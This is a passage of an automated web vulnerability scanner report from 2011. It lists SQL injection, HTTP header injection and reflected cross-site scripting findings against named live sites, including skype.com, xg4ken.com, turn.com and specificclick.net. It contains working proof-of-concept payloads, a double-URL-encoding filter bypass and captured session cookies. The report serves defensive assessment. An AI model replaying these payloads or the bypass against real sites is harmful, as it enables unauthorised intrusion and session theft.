1.48. http://community.skype.com/t5/util/componentrenderpage/component-id/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/util/componentrenderpage/component-id/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/util/componentrenderpage/component-id/?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:47:01 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 35883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
<div class="exception-page-message RuntimeException lia-component-content" class="exception-page-message RuntimeException">
...[SNIP]...
<li>
           Sorry, your request failed. A notification has been sent to the development team for investigation.<p>
...[SNIP]...

Request 2

GET /t5/util/componentrenderpage/component-id/?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:02 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.49. http://search2.skype.com/search/search.cgi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://search2.skype.com
Path:   /search/search.cgi

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /search/search.cgi?query=xss&collection=skype-en&1'=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: search2.skype.com
Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:17:41 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39998

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<!-- Meta -->
<meta cha
...[SNIP]...
<!-- Padre error status: 2 -->
...[SNIP]...

Request 2

GET /search/search.cgi?query=xss&collection=skype-en&1''=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: search2.skype.com
Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:17:43 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40007

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<!-- Meta -->
<meta cha
...[SNIP]...

2. HTTP header injection  previous  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://142.xg4ken.com/media/redir.php [k_clickid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://142.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the k_clickid request parameter is copied into the Location response header. The payload 27af3%0d%0a1445eb0004d was submitted in the k_clickid parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=27af3%0d%0a1445eb0004d&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinflexion HTTP/1.1
Host: 142.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:18:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:45 GMT; path=/; domain=.xg4ken.com
Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=27af3
1445eb0004d

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.2. http://142.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://142.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 28e5e%0d%0ae9747ada840 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=AMS|_kenshoo_clickid_&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinfle/28e5e%0d%0ae9747ada840xion HTTP/1.1
Host: 142.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:18:46 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:46 GMT; path=/; domain=.xg4ken.com
Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=infle/28e5e
e9747ada840
xion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


3. Cross-site scripting (reflected)  previous  next
There are 135 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75be5"><script>alert(1)</script>698f01d1a56 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=75be5"><script>alert(1)</script>698f01d1a56&r=1662255836 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=13151898879098e79e1e7e81d&rand=1315189887909&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_text&ifr=1&v=1.0&csync=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=6981940571811189480

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 02:30:53 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=6981940571811189480&rnd=2866977535605027834&fpid=75be5"><script>alert(1)</script>698f01d1a56&nu=n&t=&sp=n&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.2. http://afe.specificclick.net/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85163'-alert(1)-'d48efb024f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?l=19240&sz=728x90&wr=j&t=j&u=&r=&rnd=615455&pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&85163'-alert(1)-'d48efb024f=1 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76ca32722d97e66b629c0f8c67ac; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:30:58 GMT
Content-Length: 1285

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223059;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8y
...[SNIP]...
53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&85163'-alert(1)-'d48efb024f=1" width="728" height="90" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

3.3. http://afe.specificclick.net/ [pasmc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The value of the pasmc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ced'-alert(1)-'3b0145e93ed was submitted in the pasmc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?l=19240&sz=728x90&wr=j&t=j&u=&r=&rnd=615455&pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3Dc8ced'-alert(1)-'3b0145e93ed HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76ca26641b15176f9bf898619800; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:30:58 GMT
Content-Length: 1283

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223058;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8y
...[SNIP]...
y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3Dc8ced'-alert(1)-'3b0145e93ed" width="728" height="90" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

3.4. http://afe.specificclick.net/serve/v=5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 508d9'-alert(1)-'a737bccdbe7 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D508d9'-alert(1)-'a737bccdbe7 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76d09f72564970422799112b38d3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:24 GMT
Vary: Accept-Encoding
Content-Length: 2743
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D508d9'-alert(1)-'a737bccdbe7http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189885" target="_blank">
...[SNIP]...

3.5. http://afe.specificclick.net/serve/v=5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e718"><script>alert(1)</script>08a95dd801e was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D7e718"><script>alert(1)</script>08a95dd801e HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:21 GMT
Vary: Accept-Encoding
Content-Length: 2788
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D7e718"><script>alert(1)</script>08a95dd801e" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
...[SNIP]...

3.6. http://afe.specificclick.net/serve/v=5 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

